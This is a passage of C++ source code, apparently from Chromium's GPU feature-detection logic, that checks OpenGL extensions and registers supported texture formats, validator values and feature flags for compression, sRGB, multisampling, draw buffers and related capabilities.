GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); } if (enable_dxt3) { AddExtensionString("GL_ANGLE_texture_compression_dxt3"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); } if (enable_dxt5) { feature_flags_.ext_texture_format_dxt5 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt5"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); } bool have_astc = gfx::HasExtension(extensions, "GL_KHR_texture_compression_astc_ldr"); if (have_astc) { feature_flags_.ext_texture_format_astc = true; AddExtensionString("GL_KHR_texture_compression_astc_ldr"); GLint astc_format_it = GL_COMPRESSED_RGBA_ASTC_4x4_KHR; GLint astc_format_max = GL_COMPRESSED_RGBA_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } astc_format_it = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR; astc_format_max = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } } bool have_atc = gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture") || gfx::HasExtension(extensions, "GL_ATI_texture_compression_atitc"); if (have_atc) { feature_flags_.ext_texture_format_atc = true; AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_EXT_texture_filter_anisotropic")) { AddExtensionString("GL_EXT_texture_filter_anisotropic"); validators_.texture_parameter.AddValue(GL_TEXTURE_MAX_ANISOTROPY_EXT); validators_.g_l_state.AddValue(GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT); } bool enable_depth_texture = false; GLenum depth_texture_format = GL_NONE; if (!workarounds_.disable_depth_texture && (gfx::HasExtension(extensions, "GL_ARB_depth_texture") || gfx::HasExtension(extensions, "GL_OES_depth_texture") || gfx::HasExtension(extensions, "GL_ANGLE_depth_texture") || gl_version_info_->is_desktop_core_profile)) { enable_depth_texture = true; depth_texture_format = GL_DEPTH_COMPONENT; feature_flags_.angle_depth_texture = gfx::HasExtension(extensions, "GL_ANGLE_depth_texture"); } if (enable_depth_texture) { AddExtensionString("GL_CHROMIUM_depth_texture"); AddExtensionString("GL_GOOGLE_depth_texture"); validators_.texture_internal_format.AddValue(GL_DEPTH_COMPONENT); validators_.texture_format.AddValue(GL_DEPTH_COMPONENT); validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_COMPONENT); } GLenum depth_stencil_texture_format = GL_NONE; if (gfx::HasExtension(extensions, "GL_EXT_packed_depth_stencil") || gfx::HasExtension(extensions, "GL_OES_packed_depth_stencil") || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_OES_packed_depth_stencil"); feature_flags_.packed_depth24_stencil8 = true; if (enable_depth_texture) { if (gl_version_info_->is_es3) { depth_stencil_texture_format = GL_DEPTH24_STENCIL8; } else { depth_stencil_texture_format = GL_DEPTH_STENCIL; } validators_.texture_internal_format.AddValue(GL_DEPTH_STENCIL); validators_.texture_format.AddValue(GL_DEPTH_STENCIL); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_24_8); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); validators_.texture_stencil_renderable_internal_format.AddValue( GL_DEPTH_STENCIL); } validators_.render_buffer_format.AddValue(GL_DEPTH24_STENCIL8); if (context_type_ == CONTEXT_TYPE_WEBGL1) { validators_.attachment.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); validators_.attachment_query.AddValue(GL_DEPTH_STENCIL_ATTACHMENT); } } if (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_OES_vertex_array_object") || gfx::HasExtension(extensions, "GL_ARB_vertex_array_object") || gfx::HasExtension(extensions, "GL_APPLE_vertex_array_object")) { feature_flags_.native_vertex_array_object = true; } if (workarounds_.use_client_side_arrays_for_stream_buffers) { feature_flags_.native_vertex_array_object = false; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_element_index_uint") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_element_index_uint"); validators_.index_type.AddValue(GL_UNSIGNED_INT); } bool has_srgb_framebuffer_support = false; if (gl_version_info_->IsAtLeastGL(3, 2) || (gl_version_info_->IsAtLeastGL(2, 0) && (gfx::HasExtension(extensions, "GL_EXT_framebuffer_sRGB") || gfx::HasExtension(extensions, "GL_ARB_framebuffer_sRGB")))) { feature_flags_.desktop_srgb_support = true; has_srgb_framebuffer_support = true; } if ((((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8")) && gfx::HasExtension(extensions, "GL_EXT_sRGB")) || feature_flags_.desktop_srgb_support) && IsWebGL1OrES2Context()) { feature_flags_.ext_srgb = true; AddExtensionString("GL_EXT_sRGB"); validators_.texture_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_internal_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.texture_format.AddValue(GL_SRGB_EXT); validators_.texture_format.AddValue(GL_SRGB_ALPHA_EXT); validators_.render_buffer_format.AddValue(GL_SRGB8_ALPHA8_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_EXT); validators_.texture_unsized_internal_format.AddValue(GL_SRGB_ALPHA_EXT); has_srgb_framebuffer_support = true; } if (gl_version_info_->is_es3) has_srgb_framebuffer_support = true; if (has_srgb_framebuffer_support && !IsWebGLContext()) { if (feature_flags_.desktop_srgb_support || gfx::HasExtension(extensions, "GL_EXT_sRGB_write_control")) { feature_flags_.ext_srgb_write_control = true; AddExtensionString("GL_EXT_sRGB_write_control"); validators_.capability.AddValue(GL_FRAMEBUFFER_SRGB_EXT); } } if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB_decode") && !IsWebGLContext()) { AddExtensionString("GL_EXT_texture_sRGB_decode"); validators_.texture_parameter.AddValue(GL_TEXTURE_SRGB_DECODE_EXT); } bool have_s3tc_srgb = false; if (gl_version_info_->is_es) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_NV_sRGB_formats") || gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc_srgb"); } else { if (gfx::HasExtension(extensions, "GL_EXT_texture_sRGB") || gl_version_info_->IsAtLeastGL(4, 1)) { have_s3tc_srgb = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); } } if (have_s3tc_srgb) { AddExtensionString("GL_EXT_texture_compression_s3tc_srgb"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5_EXT); } bool has_apple_bgra = gfx::HasExtension(extensions, "GL_APPLE_texture_format_BGRA8888"); bool has_ext_bgra = gfx::HasExtension(extensions, "GL_EXT_texture_format_BGRA8888"); bool enable_texture_format_bgra8888 = has_ext_bgra || has_apple_bgra || !gl_version_info_->is_es; bool has_ext_texture_storage = gfx::HasExtension(extensions, "GL_EXT_texture_storage"); bool has_arb_texture_storage = gfx::HasExtension(extensions, "GL_ARB_texture_storage"); bool has_texture_storage = !workarounds_.disable_texture_storage && (has_ext_texture_storage || has_arb_texture_storage || gl_version_info_->is_es3 || gl_version_info_->IsAtLeastGL(4, 2)); bool enable_texture_storage = has_texture_storage; bool texture_storage_incompatible_with_bgra = gl_version_info_->is_es3 && !has_ext_texture_storage && !has_apple_bgra; if (texture_storage_incompatible_with_bgra && enable_texture_format_bgra8888 && enable_texture_storage) { switch (context_type_) { case CONTEXT_TYPE_OPENGLES2: enable_texture_storage = false; break; case CONTEXT_TYPE_OPENGLES3: enable_texture_format_bgra8888 = false; break; case CONTEXT_TYPE_WEBGL1: case CONTEXT_TYPE_WEBGL2: case CONTEXT_TYPE_WEBGL2_COMPUTE: case CONTEXT_TYPE_WEBGPU: break; } } if (enable_texture_storage) { feature_flags_.ext_texture_storage = true; AddExtensionString("GL_EXT_texture_storage"); validators_.texture_parameter.AddValue(GL_TEXTURE_IMMUTABLE_FORMAT_EXT); } if (enable_texture_format_bgra8888) { feature_flags_.ext_texture_format_bgra8888 = true; AddExtensionString("GL_EXT_texture_format_BGRA8888"); validators_.texture_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_format.AddValue(GL_BGRA_EXT); validators_.texture_unsized_internal_format.AddValue(GL_BGRA_EXT); validators_.texture_internal_format_storage.AddValue(GL_BGRA8_EXT); validators_.texture_sized_color_renderable_internal_format.AddValue( GL_BGRA8_EXT); validators_.texture_sized_texture_filterable_internal_format.AddValue( GL_BGRA8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRA_8888); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::BGRX_8888); } bool enable_render_buffer_bgra = gl_version_info_->is_angle || !gl_version_info_->is_es; if (enable_render_buffer_bgra) { feature_flags_.ext_render_buffer_format_bgra8888 = true; AddExtensionString("GL_CHROMIUM_renderbuffer_format_BGRA8888"); validators_.render_buffer_format.AddValue(GL_BGRA8_EXT); } bool enable_read_format_bgra = gfx::HasExtension(extensions, "GL_EXT_read_format_bgra") || !gl_version_info_->is_es; if (enable_read_format_bgra) { feature_flags_.ext_read_format_bgra = true; AddExtensionString("GL_EXT_read_format_bgra"); validators_.read_pixel_format.AddValue(GL_BGRA_EXT); } feature_flags_.arb_es3_compatibility = gfx::HasExtension(extensions, "GL_ARB_ES3_compatibility") && !gl_version_info_->is_es; feature_flags_.ext_disjoint_timer_query = gfx::HasExtension(extensions, "GL_EXT_disjoint_timer_query"); if (feature_flags_.ext_disjoint_timer_query || gfx::HasExtension(extensions, "GL_ARB_timer_query") || gfx::HasExtension(extensions, "GL_EXT_timer_query")) { AddExtensionString("GL_EXT_disjoint_timer_query"); } if (gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_rgb8_rgba8"); validators_.render_buffer_format.AddValue(GL_RGB8_OES); validators_.render_buffer_format.AddValue(GL_RGBA8_OES); } if (!disallowed_features_.npot_support && (gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_texture_non_power_of_two") || gfx::HasExtension(extensions, "GL_OES_texture_npot"))) { AddExtensionString("GL_OES_texture_npot"); feature_flags_.npot_ok = true; } InitializeFloatAndHalfFloatFeatures(extensions); if (!workarounds_.disable_chromium_framebuffer_multisample) { bool ext_has_multisample = gfx::HasExtension(extensions, "GL_ARB_framebuffer_object") || (gfx::HasExtension(extensions, "GL_EXT_framebuffer_multisample") && gfx::HasExtension(extensions, "GL_EXT_framebuffer_blit")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile; if (gl_version_info_->is_angle || gl_version_info_->is_swiftshader) { ext_has_multisample |= gfx::HasExtension(extensions, "GL_ANGLE_framebuffer_multisample"); } if (ext_has_multisample) { feature_flags_.chromium_framebuffer_multisample = true; validators_.framebuffer_target.AddValue(GL_READ_FRAMEBUFFER_EXT); validators_.framebuffer_target.AddValue(GL_DRAW_FRAMEBUFFER_EXT); validators_.g_l_state.AddValue(GL_READ_FRAMEBUFFER_BINDING_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); AddExtensionString("GL_CHROMIUM_framebuffer_multisample"); } } if (gfx::HasExtension(extensions, "GL_EXT_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; } else if (gfx::HasExtension(extensions, "GL_IMG_multisampled_render_to_texture")) { feature_flags_.multisampled_render_to_texture = true; feature_flags_.use_img_for_multisampled_render_to_texture = true; } if (feature_flags_.multisampled_render_to_texture) { validators_.render_buffer_parameter.AddValue(GL_RENDERBUFFER_SAMPLES_EXT); validators_.g_l_state.AddValue(GL_MAX_SAMPLES_EXT); validators_.framebuffer_attachment_parameter.AddValue( GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_SAMPLES_EXT); AddExtensionString("GL_EXT_multisampled_render_to_texture"); } if (!gl_version_info_->is_es || gfx::HasExtension(extensions, "GL_EXT_multisample_compatibility")) { AddExtensionString("GL_EXT_multisample_compatibility"); feature_flags_.ext_multisample_compatibility = true; validators_.capability.AddValue(GL_MULTISAMPLE_EXT); validators_.capability.AddValue(GL_SAMPLE_ALPHA_TO_ONE_EXT); } if (gfx::HasExtension(extensions, "GL_INTEL_framebuffer_CMAA")) { feature_flags_.chromium_screen_space_antialiasing = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } else if (gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 0) && gfx::HasExtension(extensions, "GL_ARB_shading_language_420pack") && gfx::HasExtension(extensions, "GL_ARB_texture_storage") && gfx::HasExtension(extensions, "GL_ARB_texture_gather") && gfx::HasExtension(extensions, "GL_ARB_explicit_uniform_location") && gfx::HasExtension(extensions, "GL_ARB_explicit_attrib_location") && gfx::HasExtension(extensions, "GL_ARB_shader_image_load_store"))) { feature_flags_.chromium_screen_space_antialiasing = true; feature_flags_.use_chromium_screen_space_antialiasing_via_shaders = true; AddExtensionString("GL_CHROMIUM_screen_space_antialiasing"); } if (gfx::HasExtension(extensions, "GL_OES_depth24") || gl::HasDesktopGLFeatures() || gl_version_info_->is_es3) { AddExtensionString("GL_OES_depth24"); feature_flags_.oes_depth24 = true; validators_.render_buffer_format.AddValue(GL_DEPTH_COMPONENT24); } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_OES_standard_derivatives") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_OES_standard_derivatives"); feature_flags_.oes_standard_derivatives = true; validators_.hint_target.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); validators_.g_l_state.AddValue(GL_FRAGMENT_SHADER_DERIVATIVE_HINT_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_texture_filtering_hint")) { AddExtensionString("GL_CHROMIUM_texture_filtering_hint"); feature_flags_.chromium_texture_filtering_hint = true; validators_.hint_target.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); validators_.g_l_state.AddValue(GL_TEXTURE_FILTERING_HINT_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_OES_EGL_image_external")) { AddExtensionString("GL_OES_EGL_image_external"); feature_flags_.oes_egl_image_external = true; } if (gfx::HasExtension(extensions, "GL_NV_EGL_stream_consumer_external")) { AddExtensionString("GL_NV_EGL_stream_consumer_external"); feature_flags_.nv_egl_stream_consumer_external = true; } if (feature_flags_.oes_egl_image_external || feature_flags_.nv_egl_stream_consumer_external) { validators_.texture_bind_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.get_tex_param_target.AddValue(GL_TEXTURE_EXTERNAL_OES); validators_.texture_parameter.AddValue(GL_REQUIRED_TEXTURE_IMAGE_UNITS_OES); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_EXTERNAL_OES); } if (gfx::HasExtension(extensions, "GL_OES_compressed_ETC1_RGB8_texture") && !gl_version_info_->is_angle) { AddExtensionString("GL_OES_compressed_ETC1_RGB8_texture"); feature_flags_.oes_compressed_etc1_rgb8_texture = true; validators_.compressed_texture_format.AddValue(GL_ETC1_RGB8_OES); validators_.texture_internal_format_storage.AddValue(GL_ETC1_RGB8_OES); } if (gfx::HasExtension(extensions, "GL_CHROMIUM_compressed_texture_etc") || (gl_version_info_->is_es3 && !gl_version_info_->is_angle)) { AddExtensionString("GL_CHROMIUM_compressed_texture_etc"); validators_.UpdateETCCompressedTextureFormats(); } if (gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture")) { AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_EXPLICIT_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_IMG_texture_compression_pvrtc")) { AddExtensionString("GL_IMG_texture_compression_pvrtc"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG); } if (gfx::HasExtension(extensions, "GL_ARB_texture_rectangle") || gfx::HasExtension(extensions, "GL_ANGLE_texture_rectangle") || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ARB_texture_rectangle"); feature_flags_.arb_texture_rectangle = true; validators_.texture_bind_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.texture_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.get_tex_param_target.AddValue(GL_TEXTURE_RECTANGLE_ARB); validators_.g_l_state.AddValue(GL_TEXTURE_BINDING_RECTANGLE_ARB); } #if defined(OS_MACOSX) || defined(OS_CHROMEOS) AddExtensionString("GL_CHROMIUM_ycbcr_420v_image"); feature_flags_.chromium_image_ycbcr_420v = true; #endif if (feature_flags_.chromium_image_ycbcr_420v) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::YUV_420_BIPLANAR); } if (gfx::HasExtension(extensions, "GL_APPLE_ycbcr_422")) { AddExtensionString("GL_CHROMIUM_ycbcr_422_image"); feature_flags_.chromium_image_ycbcr_422 = true; feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::UYVY_422); } #if defined(OS_MACOSX) feature_flags_.chromium_image_xr30 = base::mac::IsAtLeastOS10_13(); #elif !defined(OS_WIN) feature_flags_.chromium_image_xb30 = gl_version_info_->IsAtLeastGL(3, 3) || gl_version_info_->IsAtLeastGLES(3, 0) || gfx::HasExtension(extensions, "GL_EXT_texture_type_2_10_10_10_REV"); #endif if (feature_flags_.chromium_image_xr30 || feature_flags_.chromium_image_xb30) { validators_.texture_internal_format.AddValue(GL_RGB10_A2_EXT); validators_.render_buffer_format.AddValue(GL_RGB10_A2_EXT); validators_.texture_internal_format_storage.AddValue(GL_RGB10_A2_EXT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_2_10_10_10_REV); } if (feature_flags_.chromium_image_xr30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::BGRX_1010102); } if (feature_flags_.chromium_image_xb30) { feature_flags_.gpu_memory_buffer_formats.Add( gfx::BufferFormat::RGBX_1010102); } if (gfx::HasExtension(extensions, "GL_ANGLE_texture_usage")) { feature_flags_.angle_texture_usage = true; AddExtensionString("GL_ANGLE_texture_usage"); validators_.texture_parameter.AddValue(GL_TEXTURE_USAGE_ANGLE); } bool have_occlusion_query = gl_version_info_->IsAtLeastGLES(3, 0) || gl_version_info_->IsAtLeastGL(3, 3); bool have_ext_occlusion_query_boolean = gfx::HasExtension(extensions, "GL_EXT_occlusion_query_boolean"); bool have_arb_occlusion_query2 = gfx::HasExtension(extensions, "GL_ARB_occlusion_query2"); bool have_arb_occlusion_query = (gl_version_info_->is_desktop_core_profile && gl_version_info_->IsAtLeastGL(1, 5)) || gfx::HasExtension(extensions, "GL_ARB_occlusion_query"); if (have_occlusion_query || have_ext_occlusion_query_boolean || have_arb_occlusion_query2 || have_arb_occlusion_query) { feature_flags_.occlusion_query = have_arb_occlusion_query; if (context_type_ == CONTEXT_TYPE_OPENGLES2) { AddExtensionString("GL_EXT_occlusion_query_boolean"); } feature_flags_.occlusion_query_boolean = true; feature_flags_.use_arb_occlusion_query2_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && (have_arb_occlusion_query2 || (gl_version_info_->IsAtLeastGL(3, 3) && gl_version_info_->IsLowerThanGL(4, 3))); feature_flags_.use_arb_occlusion_query_for_occlusion_query_boolean = !have_ext_occlusion_query_boolean && have_arb_occlusion_query && !have_arb_occlusion_query2; } if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || (gfx::HasExtension(extensions, "GL_ARB_instanced_arrays") && gfx::HasExtension(extensions, "GL_ARB_draw_instanced")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ANGLE_instanced_arrays"); feature_flags_.angle_instanced_arrays = true; validators_.vertex_attribute.AddValue(GL_VERTEX_ATTRIB_ARRAY_DIVISOR_ANGLE); } bool have_es2_draw_buffers_vendor_agnostic = gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_draw_buffers") || gfx::HasExtension(extensions, "GL_EXT_draw_buffers"); bool can_emulate_es2_draw_buffers_on_es3_nv = gl_version_info_->is_es3 && gfx::HasExtension(extensions, "GL_NV_draw_buffers"); bool is_webgl_compatibility_context = gfx::HasExtension(extensions, "GL_ANGLE_webgl_compatibility"); bool have_es2_draw_buffers = !workarounds_.disable_ext_draw_buffers && (have_es2_draw_buffers_vendor_agnostic || can_emulate_es2_draw_buffers_on_es3_nv) && (context_type_ == CONTEXT_TYPE_OPENGLES2 || (context_type_ == CONTEXT_TYPE_WEBGL1 && IsWebGLDrawBuffersSupported(is_webgl_compatibility_context, depth_texture_format, depth_stencil_texture_format))); if (have_es2_draw_buffers) { AddExtensionString("GL_EXT_draw_buffers"); feature_flags_.ext_draw_buffers = true; feature_flags_.nv_draw_buffers = can_emulate_es2_draw_buffers_on_es3_nv && !have_es2_draw_buffers_vendor_agnostic; } if (IsWebGL2OrES3OrHigherContext() || have_es2_draw_buffers) { GLint max_color_attachments = 0; glGetIntegerv(GL_MAX_COLOR_ATTACHMENTS_EXT, &max_color_attachments); for (GLenum i = GL_COLOR_ATTACHMENT1_EXT; i < static_cast<GLenum>(GL_COLOR_ATTACHMENT0 + max_color_attachments); ++i) { validators_.attachment.AddValue(i); validators_.attachment_query.AddValue(i); } static_assert(GL_COLOR_ATTACHMENT0_EXT == GL_COLOR_ATTACHMENT0, "GL_COLOR_ATTACHMENT0_EXT should equal GL_COLOR_ATTACHMENT0"); validators_.g_l_state.AddValue(GL_MAX_COLOR_ATTACHMENTS_EXT); validators_.g_l_state.AddValue(GL_MAX_DRAW_BUFFERS_ARB); GLint max_draw_buffers = 0; glGetIntegerv(GL_MAX_DRAW_BUFFERS_ARB, &max_draw_buffers); for (GLenum i = GL_DRAW_BUFFER0_ARB; i < static_cast<GLenum>(GL_DRAW_BUFFER0_ARB + max_draw_buffers); ++i) { validators_.g_l_state.AddValue(i); } } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_blend_minmax") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_blend_minmax"); validators_.equation.AddValue(GL_MIN_EXT); validators_.equation.AddValue(GL_MAX_EXT); static_assert(GL_MIN_EXT == GL_MIN && GL_MAX_EXT == GL_MAX, "min & max variations must match"); } if (gfx::HasExtension(extensions, "GL_EXT_frag_depth") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_frag_depth"); feature_flags_.ext_frag_depth = true; } if (gfx::HasExtension(extensions, "GL_EXT_shader_texture_lod") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_shader_texture_lod"); feature_flags_.ext_shader_texture_lod = true; } bool ui_gl_fence_works = gl::GLFence::IsSupported(); UMA_HISTOGRAM_BOOLEAN("GPU.FenceSupport", ui_gl_fence_works); feature_flags_.map_buffer_range = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_map_buffer_range") || gfx::HasExtension(extensions, "GL_EXT_map_buffer_range"); if (has_pixel_buffers && ui_gl_fence_works && !workarounds_.disable_async_readpixels) { feature_flags_.use_async_readpixels = true; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_ARB_sampler_objects")) { feature_flags_.enable_samplers = true; } if ((gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_discard_framebuffer")) && !workarounds_.disable_discard_framebuffer) { AddExtensionString("GL_EXT_discard_framebuffer"); feature_flags_.ext_discard_framebuffer = true; } if (ui_gl_fence_works) { AddExtensionString("GL_CHROMIUM_sync_query"); feature_flags_.chromium_sync_query = true; } if (!workarounds_.disable_blend_equation_advanced) { bool blend_equation_advanced_coherent = gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced_coherent") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced_coherent"); if (blend_equation_advanced_coherent || gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced")) { const GLenum equations[] = { GL_MULTIPLY_KHR, GL_SCREEN_KHR, GL_OVERLAY_KHR, GL_DARKEN_KHR, GL_LIGHTEN_KHR, GL_COLORDODGE_KHR, GL_COLORBURN_KHR, GL_HARDLIGHT_KHR, GL_SOFTLIGHT_KHR, GL_DIFFERENCE_KHR, GL_EXCLUSION_KHR, GL_HSL_HUE_KHR, GL_HSL_SATURATION_KHR, GL_HSL_COLOR_KHR, GL_HSL_LUMINOSITY_KHR}; for (GLenum equation : equations) validators_.equation.AddValue(equation); if (blend_equation_advanced_coherent) AddExtensionString("GL_KHR_blend_equation_advanced_coherent"); AddExtensionString("GL_KHR_blend_equation_advanced"); feature_flags_.blend_equation_advanced = true; feature_flags_.blend_equation_advanced_coherent = blend_equation_advanced_coherent; } } if (gfx::HasExtension(extensions, "GL_NV_framebuffer_mixed_samples")) { AddExtensionString("GL_CHROMIUM_framebuffer_mixed_samples"); feature_flags_.chromium_framebuffer_mixed_samples = true; validators_.g_l_state.AddValue(GL_COVERAGE_MODULATION_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_NV_path_rendering")) { bool has_dsa = gl_version_info_->IsAtLeastGL(4, 5) || gfx::HasExtension(extensions, "GL_EXT_direct_state_access"); bool has_piq = gl_version_info_->IsAtLeastGL(4, 3) || gfx::HasExtension(extensions, "GL_ARB_program_interface_query"); bool has_fms = feature_flags_.chromium_framebuffer_mixed_samples; if ((gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 2) && has_dsa && has_piq)) && has_fms) { AddExtensionString("GL_CHROMIUM_path_rendering"); feature_flags_.chromium_path_rendering = true; validators_.g_l_state.AddValue(GL_PATH_MODELVIEW_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_PROJECTION_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_FUNC_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_REF_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_VALUE_MASK_CHROMIUM); } } if ((gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_EXT_texture_rg") || gfx::HasExtension(extensions, "GL_ARB_texture_rg")) && IsGL_REDSupportedOnFBOs()) { feature_flags_.ext_texture_rg = true; AddExtensionString("GL_EXT_texture_rg"); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R8_EXT); validators_.texture_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RG8_EXT); 